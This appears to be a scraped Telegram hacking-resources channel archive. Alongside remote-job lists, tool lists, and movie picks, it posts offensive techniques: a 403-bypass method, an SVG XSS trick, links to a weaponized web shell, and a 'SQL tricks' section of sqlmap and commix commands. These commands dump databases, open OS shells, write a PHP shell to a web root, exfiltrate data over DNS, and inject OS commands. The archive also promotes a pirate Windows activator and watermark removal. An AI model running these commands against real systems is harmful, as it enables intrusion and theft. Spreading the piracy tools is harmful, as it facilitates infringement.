Termux All Command [Telegram Group]
Ir al canal en Telegram
Hello This Is Termux All Command Official Telegram Group. Here Share All Kind of Resourses. It is Also backup of Facebook Page Telegram Channel >> https://t.me/termuxcommandfull Facebook Page >> https://www.facebook.com/termux.command.full
Mostrar más1 332
Suscriptores
+424 horas
+197 días
+5230 días
Archivo de publicaciones
🚀 RedirXploit: Detect Open Redirect Vulnerabilities 🚀
Open Redirect vulnerabilities can expose your applications to phishing attacks and data theft. RedirXploit automates the detection process, making it faster and easier for you! This tool helps identify vulnerable parameters that can be exploited.
Features:
Efficient Scanning: Quickly detect Open Redirect issues.
Scan Files or Single URLs: Test individual URLs or entire lists.
Identify Vulnerable Parameters: Pinpoint weak points in your application.
Custom Payloads: Test specific redirect behaviors.
Detailed Reports: Clear results for easy analysis.
Video Demo: https://lnkd.in/eq_rkP5z
GitHub Repository : https://lnkd.in/esqA_4A4
Companies List that are 𝗛𝗜𝗥𝗜𝗡𝗚 for 100% REMOTE.
1. Deltek - https://lnkd.in/dkSfGNbF
2. Confluent - https://lnkd.in/dNSTmUeH
3. Cengage Group -https://lnkd.in/gGkT6jRZ
4. Quest Software - https://lnkd.in/dkHSNGmM
5. Upstart - https://lnkd.in/dGR4DJ52
6. hims & hers - https://lnkd.in/gr_SdVdE
7. UserGems - https://lnkd.in/gXi3mNf6
8. Abnormal Security - https://lnkd.in/gn5M4VDF
9. Cash App - https://lnkd.in/gdp8yUm8
10. LogicGate - https://lnkd.in/gjgX27Bc
11. Faire - https://lnkd.in/gYRNr9VM
12. Renaissanc - https://lnkd.in/gesiM_Dw
13. Rec Room - https://lnkd.in/gErDuTNa
14. VGS-https://lnkd.in/g7Ajb77F
15. VAST Data - https://lnkd.in/gMUFt4y9
16. Sorcero - https://lnkd.in/gpmDTnH7
17. McGraw Hill - https://lnkd.in/g59pzFf4
18. Patreon - https://lnkd.in/gzQptMcQ
19. Beekeeper - https://lnkd.in/gxd7rs7Q
20. Upwork-https://lnkd.in/gt4HYmd6
21. DocuSign - https://lnkd.in/ggfUncZf
22. DealHub.io - https://lnkd.in/gyNED4yp
23. Census - https://lnkd.in/gAq7PGzc
24. Intrado - https://lnkd.in/gH3wuNWZ
25. Cloudflare - https://lnkd.in/g9JPXp2F
26. Funded. club - https://lnkd.in/gpH4FazA
27. Workiva - https://lnkd.in/g-FUYYdR
28. MissionWired - https://lnkd.in/gMA6AVdG
29. Workera - https://lnkd.in/g2YzZu-H
30. Jenius Bank - https://lnkd.in/gxGqHGkH
31. Goinstacare - https://lnkd.in/d6ZN5FVD
32. Uplers - https://www.uplers.com
33. Quantum - https://lnkd.in/d8jFCeuU
34. Canonical - https://lnkd.in/d9mf5Rr3
35. Kemecon - http://kemecon.com
37. DigitalOcean - https://lnkd.in/dYgDZ-WF
36. Gitlab - https://lnkd.in/d2eGyKRv
38. Atlassian - https://Inkd.in/dp-SFzfT
39. AngelOne - https://lnkd.in/dk3NwDn6
40. Shopify - https://lnkd.in/d9zpGKTy
41. Appcues - https://lnkd.in/dp2Jiupp
42. Arkency - https://lnkd.in/dBB_wZaR
43. Automattic - https://lnkd.in/ddSBdusv
44. Awesomemotive - https://lnkd.in/diZZjb4J
45. Buffer - https://lnkd.in/d7ihgxkA
46. Constructor - https://lnkd.in/daBzMdxM
47. Contra - https://contra.com/careers
48. Doist - https://doist.com/careers/
49. DuckDuckGo - https://lnkd.in/d_Kv9dM6
50. Bold-https://lnkd.in/dZQ8dQnq
51. Akamai Technologies - https://lnkd.in/dpTN5nPT
52. Cloudbeds - https://lnkd.in/dg3gC5v6
53. Mentorsity - https://lnkd.in/d8YyGHNH
54. Expert Thinking - https://lnkd.in/dz_4HFUI
55. iVisa - https://ivisa.breezy.hr/
56. Affordmate - http://www.affordmate.com
57. Xapobank - http://www.xapobank.com
58. Symetra - http://www.symetra.com
59. Docker, Inc - https://lnkd.in/gfX5-pQG
Companies List that are 𝗛𝗜𝗥𝗜𝗡𝗚 for 100% REMOTE.
1. Deltek - https://lnkd.in/dkSfGNbF
2. Confluent - https://lnkd.in/dNSTmUeH
3. Cengage Group -https://lnkd.in/gGkT6jRZ
4. Quest Software - https://lnkd.in/dkHSNGmM
5. Upstart - https://lnkd.in/dGR4DJ52
6. hims & hers - https://lnkd.in/gr_SdVdE
7. UserGems - https://lnkd.in/gXi3mNf6
8. Abnormal Security - https://lnkd.in/gn5M4VDF
9. Cash App - https://lnkd.in/gdp8yUm8
10. LogicGate - https://lnkd.in/gjgX27Bc
11. Faire - https://lnkd.in/gYRNr9VM
12. Renaissanc - https://lnkd.in/gesiM_Dw
13. Rec Room - https://lnkd.in/gErDuTNa
14. VGS-https://lnkd.in/g7Ajb77F
15. VAST Data - https://lnkd.in/gMUFt4y9
16. Sorcero - https://lnkd.in/gpmDTnH7
17. McGraw Hill - https://lnkd.in/g59pzFf4
18. Patreon - https://lnkd.in/gzQptMcQ
19. Beekeeper - https://lnkd.in/gxd7rs7Q
20. Upwork-https://lnkd.in/gt4HYmd6
21. DocuSign - https://lnkd.in/ggfUncZf
22. DealHub.io - https://lnkd.in/gyNED4yp
23. Census - https://lnkd.in/gAq7PGzc
24. Intrado - https://lnkd.in/gH3wuNWZ
25. Cloudflare - https://lnkd.in/g9JPXp2F
26. Funded. club - https://lnkd.in/gpH4FazA
27. Workiva - https://lnkd.in/g-FUYYdR
28. MissionWired - https://lnkd.in/gMA6AVdG
29. Workera - https://lnkd.in/g2YzZu-H
30. Jenius Bank - https://lnkd.in/gxGqHGkH
31. Goinstacare - https://lnkd.in/d6ZN5FVD
32. Uplers - https://www.uplers.com
33. Quantum - https://lnkd.in/d8jFCeuU
34. Canonical - https://lnkd.in/d9mf5Rr3
35. Kemecon - http://kemecon.com
37. DigitalOcean - https://lnkd.in/dYgDZ-WF
36. Gitlab - https://lnkd.in/d2eGyKRv
38. Atlassian - https://Inkd.in/dp-SFzfT
39. AngelOne - https://lnkd.in/dk3NwDn6
40. Shopify - https://lnkd.in/d9zpGKTy
41. Appcues - https://lnkd.in/dp2Jiupp
42. Arkency - https://lnkd.in/dBB_wZaR
43. Automattic - https://lnkd.in/ddSBdusv
44. Awesomemotive - https://lnkd.in/diZZjb4J
45. Buffer - https://lnkd.in/d7ihgxkA
🟢🟡🔴 𝐓𝐎𝐏 𝟓𝟎 𝐃𝐈𝐆𝐈𝐓𝐀𝐋 𝐅𝐎𝐑𝐄𝐍𝐒𝐈𝐂𝐒 𝐓𝐎𝐎𝐋𝐒
1.Network Forensic Tools:
Nmap
Wireshark
Xplico
Snort
TCPDump
The Sleuth Kit
2.Mobile Forensics Tools:
Elcomsoft iOS Forensic Toolkit
Mobile Verification Toolkit
Oxygen Forensic
MOBILedit
Cellebrite UFED
MSAB XRY
3.Malware Analysis Tools:
Wireshark
YARA
Malwarebytes
VirusTotal
Cuckoo Sandbox
IDA Pro
4.Data Recovery Tools:
Recuva
EaseUS Data Recovery
TestDisk
Stellar Data Recovery
PhotoRec
Disk Drill
5.Email Forensic Tools:
MailXaminer
MailPro+
Xtraxtor
Aid4Mail
eMailTrackerPro
Autopsy
6.OSINT Tools:
Maltego
Nmap
OSINT Framework
Shodan
Recon-ng
TheHarvester
7.Live Forensics Tools:
OS Forensics
Encase Live
CAINE
F-Response
Kali Linux Forensic Mode
8.Memory Forensics Tools:
Volatility
DumpIt
memDump
Access Data FTK Imager
Hibernation Recon
WindowSCOPE
9.Cloud Forensic Tools:
Magnet AXIOM
MSAB XRY Cloud
Azure CLI
BUG BOUNTY TIPS 💪
Top 10 Websites for Beginners to Know This.
Use For:-
1. Certificate transparency logs.
:- https://crt.sh/
2. Nuclei Templates Directory
:- https://lnkd.in/gCAnE5tR
3. Recon methodology and oneliner commands
:- https://lnkd.in/gqzkZNYN
4. Old HackerOne Reports
:- https://lnkd.in/gSwe-yuf
5. Onelinertips and Tools and Extensions
:- https://lostsec.xyz/
6. Nslookup, whois, and reverse lookup
:- https://ping.eu/
7. Check status code and response headers
:- https://httpstatus.io/
8. Create vulnerability reports
:- https://vulnrepo.com/
9. Blind XSS
:- https://xss.report/
10. Advanced search operators (Google Dorks)
:- https://lnkd.in/g2ahA3YD
hashtag#bug hashtag#bugbounty hashtag#hacking hashtag#cybersecurity hashtag#penetretion hashtag#jobs
𝐎𝐧𝐢𝐨𝐧𝐆𝐏𝐓
Source:
http[://]oniongpt6lntsoztgylhju7nmqedlq6fjexe55z327lmxyae3nutlyad[.]onion/
Use tor browser
Micosoft Toolkit . most use for windows and Office Activator
30 Movies Every Programmer Must Watch 😲
1. The Social Network (2010)
2. Steve Jobs (2015)
3. Pirates of Silicon Valley (1999)
4. The Imitation Game (2014)
5. Hackers (1995)
6. Ex Machina (2014)
7. Her (2013)
8. Tron (1982)
9. Tron: Legacy (2010)
10. The Matrix (1999)
11. WarGames (1983)
12. Sneakers (1992)
13. Jobs (2013)
14. Antitrust (2001)
15. Blackhat (2015)
16. The Fifth Estate (2013)
17. The Circle (2017)
18. Silicon Valley (TV Series, 2014–2019)
19. Source Code (2011)
20. Chappie (2015)
21. Mr. Robot (TV Series, 2015–2019)
22. Ghost in the Shell (1995)
23. Minority Report (2002)
24. Transcendence (2014)
25. Ready Player One (2018)
26. Artificial Intelligence: AI (2001)
27. Revolt (2017)
28. The Thirteenth Floor (1999)
29. Eagle Eye (2008)
30. Terminator 2: Judgment Day (1991)
👉👉 https://techtheworld.net
[+] 403 bypass methodology !
1- using space symbols
exmaple:
/admin -> 403
/admin%09 -> 200
/admin%20 -> 200
2- use traversal
Example:
/admin -> 403
/..;/admin -> 200
you can fuzz with traversal sometimes that's end with results
Example: /..;/FUZZ
Download shutterstock images without watermark
Link :- Click here
𝗦𝘁𝗲𝗽 𝟭 - 𝗣𝗿𝗮𝗰𝘁𝗶𝗰𝗮𝗹 𝗕𝘂𝗴 𝗕𝗼𝘂𝗻𝘁𝘆 𝗖𝗼𝘂𝗿𝘀𝗲: Start here! This course will give you a solid foundation in web app exploitation and sharpen your bug bounty skills.
𝗦𝘁𝗲𝗽 𝟮 - 𝗣𝗿𝗮𝗰𝘁𝗶𝗰𝗮𝗹 𝗪𝗲𝗯 𝗣𝗲𝗻𝘁𝗲𝘀𝘁 𝗔𝘀𝘀𝗼𝗰𝗶𝗮𝘁𝗲 (𝗣𝗪𝗣𝗔) 𝗘𝘅𝗮𝗺: Modeled after real-world scenarios, this exam will put your knowledge to the test and prepare you for the next level!
𝗦𝘁𝗲𝗽 𝟯 - 𝗣𝗿𝗮𝗰𝘁𝗶𝗰𝗮𝗹 𝗪𝗲𝗯 𝗛𝗮𝗰𝗸𝗶𝗻𝗴 𝗖𝗼𝘂𝗿𝘀𝗲: Once you’ve aced the PWPA, dive deeper into Practical Web Hacking, where you'll tackle vulnerabilities and learn remediation techniques.
𝗦𝘁𝗲𝗽 𝟰 - 𝗣𝗿𝗮𝗰𝘁𝗶𝗰𝗮𝗹 𝗔𝗣𝗜 𝗛𝗮𝗰𝗸𝗶𝗻𝗴 𝗖𝗼𝘂𝗿𝘀𝗲: Now, it’s time to focus on APIs! In this course, you’ll perform attacks against vulnerable API endpoints, prepping you for the final step.
𝗦𝘁𝗲𝗽 𝟱 - 𝗧𝗵𝗲 𝗣𝗪𝗣𝗣 𝗘𝘅𝗮𝗺: You’re ready for the big challenge—the PWPP Exam! Test everything you've learned with real-world scenarios and level up as a web app pentester.
Neat trick for SVG file upload exploits. Add a foreignObject tag and include almost any working XSS payload in the SVG image file. Helpful for bypassing CSP or bypassing servers that strip strings.
Many file uploads allow SVGs and are prone to tampering.
🕸 Pentesting Websites 🕸
🎯 SqlInjection:
▪️https://github.com/Neohapsis/bbqsql
▪️https://github.com/libeclipse/blind-sql-bitshifting
▪️https://github.com/sqlmapproject/sqlmap
▪️https://github.com/HandsomeCam/Absinthe
🤜 Pentest Framework
▪️https://github.com/trustedsec/ptf
▪️https://github.com/georgiaw/Smartphone-Pentest-Framework
▪️https://github.com/dloss/python-pentest-tools
▪️https://github.com/enaqx/awesome-pentest
▪️https://github.com/PenturaLabs/Linux_Exploit_Suggester
🌐 Webapp
▪️http://www.websecurify.com/
▪️https://www.netsparker.com/
▪️http://www.acunetix.com/vulnerability-scanner/
▪️https://www.rapid7.com/products/nexpose/
▪️http://www.tenable.com/products/nessus-vulnerability-scanner
▪️https://secapps.com/
▪️https://github.com/Arachni/arachni
▪️https://github.com/leebaird/discover/blob/master/discover.sh
💥 Web exploitation
▪️https://github.com/1N3/Sn1per
WPScan ( https://wpscan.org/ )
Black box WordPress vulnerability scanner ( https://t.me/ViperZCrew/14001 )
▪️https://github.com/RUB-NDS/WS-Attacker
SQLmap - Automatic SQL injection and database takeover tool ( sqlmap.org )
weevely3 - Weaponized web shell ( https://github.com/epinna/weevely3 )
Wappalyzer - Wappalyzer uncovers the technologies used on websites ( https://github.com/AliasIO/Wappalyzer )
cms-explorer - CMS Explorer is designed to reveal the the specific modules, plugins, components and themes that various CMS driven web sites are running. ( https://github.com/FlorianHeigl/cms-explorer )
joomscan - Joomla CMS scanner ( https://github.com/rezasp/joomscan.git )
WhatWeb - Website Fingerprinter ( https://github.com/urbanadventurer/WhatWeb )
BlindElephant - Web Application Fingerprinter ( https://github.com/lokifer/BlindElephant )
🧉 Complete Bug Bounty tool List 🧉
🧉 dnscan
https://github.com/rbsec/dnscan
🧉 Knockpy
https://github.com/guelfoweb/knock
🧉 Sublist3r
https://github.com/aboul3la/Sublist3r
🧉 massdns
https://github.com/blechschmidt/massdns
🧉 nmap
https://nmap.org
🧉 masscan
https://github.com/robertdavidgraham/masscan
🧉 EyeWitness
https://github.com/ChrisTruncer/EyeWitness
🧉 DirBuster
https://sourceforge.net/projects/dirbuster/
🧉 dirsearch
https://github.com/maurosoria/dirsearch
🧉 Gitrob
https://github.com/michenriksen/gitrob
🧉 git-secrets
https://github.com/awslabs/git-secrets
🧉 sandcastle
https://github.com/yasinS/sandcastle
🧉 bucket_finder
https://digi.ninja/projects/bucket_finder.php
🧉 GoogD0rker
https://github.com/ZephrFish/GoogD0rker/
🧉 Wayback Machine
https://web.archive.org
🧉 waybackurls
https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
🧉 Sn1per
https://github.com/1N3/Sn1per/
🧉 XRay
https://github.com/evilsocket/xray
🧉 wfuzz
https://github.com/xmendez/wfuzz/
🧉 patator
https://github.com/lanjelot/patator
🧉 datasploit
https://github.com/DataSploit/datasploit
🧉 hydra
https://github.com/vanhauser-thc/thc-hydra
🧉 changeme
https://github.com/ztgrace/changeme
🧉 MobSF
https://github.com/MobSF/Mobile-Security-Framework-MobSF/
🧉 Apktool
https://github.com/iBotPeaches/Apktool
🧉 dex2jar
https://sourceforge.net/projects/dex2jar/
🧉 sqlmap
http://sqlmap.org/
🧉 oxml_xxe
https://github.com/BuffaloWill/oxml_xxe/
🧉 XXE Injector
https://github.com/enjoiz/XXEinjector
🧉 The JSON Web Token Toolkit
https://github.com/ticarpi/jwt_tool
🧉 ground-control
https://github.com/jobertabma/ground-control
🧉 ssrfDetector
https://github.com/JacobReynolds/ssrfDetector
🧉 LFISuit
https://github.com/D35m0nd142/LFISuite
🧉 GitTools
https://github.com/internetwache/GitTools
🧉 dvcs-ripper
https://github.com/kost/dvcs-ripper
🧉 tko-subs
https://github.com/anshumanbh/tko-subs
🧉HostileSubBruteforcer
https://github.com/nahamsec/HostileSubBruteforcer
🧉 Race the Web
https://github.com/insp3ctre/race-the-web
🧉 ysoserial
https://github.com/GoSecure/ysoserial
🧉 PHPGGC
https://github.com/ambionics/phpggc
🧉 CORStest
https://github.com/RUB-NDS/CORStest
🧉 retire-js
https://github.com/RetireJS/retire.js
🧉 getsploit
https://github.com/vulnersCom/getsploit
🧉 Findsploit
https://github.com/1N3/Findsploit
🧉 bfac
https://github.com/mazen160/bfac
🧉 WPScan
https://wpscan.org/
🧉 CMSMap
https://github.com/Dionach/CMSmap
🧉 Amass
https://github.com/OWASP/Amass
━━━━━━━━━━━━━
Share and support 🤟😉
@new_everything_free 😘
😍 Complete free Bug Bounty tool List for termux and kali linux 😍
➖▪️ ▪️➖
dnscan https://github.com/rbsec/dnscan
Knockpy https://github.com/guelfoweb/knock
Sublist3r https://github.com/aboul3la/Sublist3r
massdns https://github.com/blechschmidt/massdns
nmap https://nmap.org
masscan https://github.com/robertdavidgraham/masscan
EyeWitness https://github.com/ChrisTruncer/EyeWitness
DirBuster https://sourceforge.net/projects/dirbuster/
dirsearch https://github.com/maurosoria/dirsearch
Gitrob https://github.com/michenriksen/gitrob
git-secrets https://github.com/awslabs/git-secrets
sandcastle https://github.com/yasinS/sandcastle
bucket_finder https://digi.ninja/projects/bucket_finder.php
GoogD0rker https://github.com/ZephrFish/GoogD0rker/
Wayback Machine https://web.archive.org
waybackurls https://gist.github.com/mhmdiaa/adf6bff70142e5091792841d4b372050
Sn1per https://github.com/1N3/Sn1per/
XRay https://github.com/evilsocket/xray
wfuzz https://github.com/xmendez/wfuzz/
patator https://github.com/lanjelot/patator
datasploit https://github.com/DataSploit/datasploit
hydra https://github.com/vanhauser-thc/thc-hydra
changeme https://github.com/ztgrace/changeme
MobSF https://github.com/MobSF/Mobile-Security-Framework-MobSF/
Apktool https://github.com/iBotPeaches/Apktool
dex2jar https://sourceforge.net/projects/dex2jar/
sqlmap http://sqlmap.org/
oxml_xxe https://github.com/BuffaloWill/oxml_xxe/
XXE Injector https://github.com/enjoiz/XXEinjector
The JSON Web Token Toolkit https://github.com/ticarpi/jwt_tool
ground-control https://github.com/jobertabma/ground-control
ssrfDetector https://github.com/JacobReynolds/ssrfDetector
LFISuit https://github.com/D35m0nd142/LFISuite
GitTools https://github.com/internetwache/GitTools
dvcs-ripper https://github.com/kost/dvcs-ripper
tko-subs https://github.com/anshumanbh/tko-subs
HostileSubBruteforcer https://github.com/nahamsec/HostileSubBruteforcer
Race the Web https://github.com/insp3ctre/race-the-web
ysoserial https://github.com/GoSecure/ysoserial
PHPGGC https://github.com/ambionics/phpggc
CORStest https://github.com/RUB-NDS/CORStest
retire-js https://github.com/RetireJS/retire.js
getsploit https://github.com/vulnersCom/getsploit
Findsploit https://github.com/1N3/Findsploit
bfac https://github.com/mazen160/bfac
WPScan https://wpscan.org/
CMSMap https://github.com/Dionach/CMSmap
Amass https://github.com/OWASP/Amass
⭐️⭐️⭐️⭐️⭐️ 🆂🆀🅻 🆃🆁🅸🅲🅺🆂 ⭐️⭐️⭐️⭐️⭐️
✅ SQLi with Blind (True/False)
- Time-Based Blind SQLi
sqlmap -u 'http://127.0.0.1/page.php?id=1' --method=GET --data="id=1" --technique=T --time-sec=5
- Boolean-Based Blind SQLi
sqlmap -u 'http://127.0.0.1/page.php?id=1' --method=GET --data="id=1" --technique=B --boolean-based
✅ SQLi with Error-Based
sqlmap -u 'http://127.0.0.1/page.php?id=1' --method=GET --data="id=1" --technique=E --dbms=mysql --risk=3 --level=5
✅ Union-Based SQL Injection
sqlmap -u 'http://127.0.0.1/page.php?id=1' --method=GET --data="id=1" --union-cols=1-5 -D database_name -T table_name -C column1,column2 --dump
✅ Out-of-Band (OOB) SQLi
sqlmap -u 'http://127.0.0.1/page.php?id=1' --method=GET --data="id=1" --technique=U --dns-domain="example.com" --level=5 --risk=3
✅ SQLi with WAF Evasion
sqlmap -u 'http://127.0.0.1/page.php?id=1' --data="id=1" --tamper=between --level=5 --risk=3
✅ SQLi Get Shell
sqlmap -u 'http://127.0.0.1/page.php?id=1' --data="id=1" --os-shell --level=5 --risk=3
✅ SQLi with vulnerability File Upload
sqlmap -u 'http://127.0.0.1/page.php?id=1' --data="id=1" --file-write='/path/to/local/shell.php' --file-dest='/var/www/html/shell.php'
✅ Exfiltrate Data using DNS Tunneling
sqlmap -u 'http://127.0.0.1/page.php?id=1' --dns-domain="mydomain.com" --level=5 --risk=3
⚠️ Commix Bug hunting command :
✅ OS Injection (Recommend)
commix -u "https://hackerone.com" --crawl=2 --batch --skip-heuristics --force-ssl --random-agent --tamper=space2comment --os-cmd="ls/id/whoami"
✅ Commix + "SQLmap"
commix -u "https://hackerone.com/" --batch --crawl=2 | grep "=" | tee urls.txt && sqlmap -m urls.txt --batch --random-agent
✅ Commix + "BurpSuite Monitoring"
commix -u "https://hackerone.com/" --crawl=2 --batch --skip-heuristics --force-ssl --random-agent --tamper=space2comment --os-cmd="id/id/whoami" --proxy="http://127.0.0.1:8080"
